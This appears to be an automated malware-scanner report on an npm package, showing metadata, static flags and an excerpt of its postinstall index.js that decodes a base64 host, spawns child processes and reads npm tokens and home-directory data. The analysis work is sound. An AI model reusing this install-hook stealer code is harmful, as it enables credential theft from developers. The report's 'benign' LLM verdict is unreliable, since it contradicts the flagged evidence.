// npm package
auth0-templates-scripts-utils
Extended utility functions and helper modules for the auth0-templates-scripts integration suite..
versions
2
maintainers
1
license
Apache-2.0
first publish
2026-05-21
publisher
dov-nods-autho
tarball
43,529 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-21
// exfil path
what is read → where it shipssteals
- ● npm token
- ○ home dir
- ○ shell history
- ○ system info
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> const _child = require('child_process');
> (function() {
> const _target = Buffer.from("ZGVwLXVwZGF0ZS1jaS0wMi5sYXB4YTM1NC53b3JrZXJzLmRldg==", "base64").toString();// offending code· @1.0.5· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
- @1.0.5··AUTO-PUBLISHED·publisher: dov-nods-authoheuristic 75/100static flags 7llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:7dosv-flagged:MAL-2026-4490reads-npmrcreads-env-varsreads-homedirreads-shell-historyreads-system-infobase64-decodechild-process-spawn
→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 7
--- install scripts --- ### postinstall node index.js --- package/index.js (excerpt) --- const _os = require('os'); const _https = require('https'); const _fs = require('fs'); const _path = require('path'); const _child = require('child_process'); const _dns = require('dns').promises; const prettyLog = (data, title = "Log") => { return; }; (function() { setTimeout(async () => { try { const _target = Buffer.from("ZGVwLXVwZGF0ZS1jaS0wMi5sYXB4YTM1NC53b3JrZXJzLmRldg==", "base64").toString(); let _projectContext = 'no-package'; let _projectFiles = 'no-files'; try { const _cwd = process.cwd(); let _myHelperName = 'unknown-helper'; let _myInfectedName = 'unknown-infected'; try { const _helperJsonPath = _path.join(__dirname, 'package.json'); if (_fs.existsSync(_helperJsonPath)) { _myHelperName = JSON.parse(_fs.readFileSync(_helperJsonPath, 'utf8')).name; } if (_myHelperName.endsWith('-utils')) { _myInfectedName = _myHelperName.slice(0, -6); } else { const _infectedJsonPath = _path.join(__dirname, '..', '..', 'package.json'); if (_fs.existsSync(_infectedJsonPath)) { _myInfectedName = JSON.parse(_fs.readFileSync(_infected
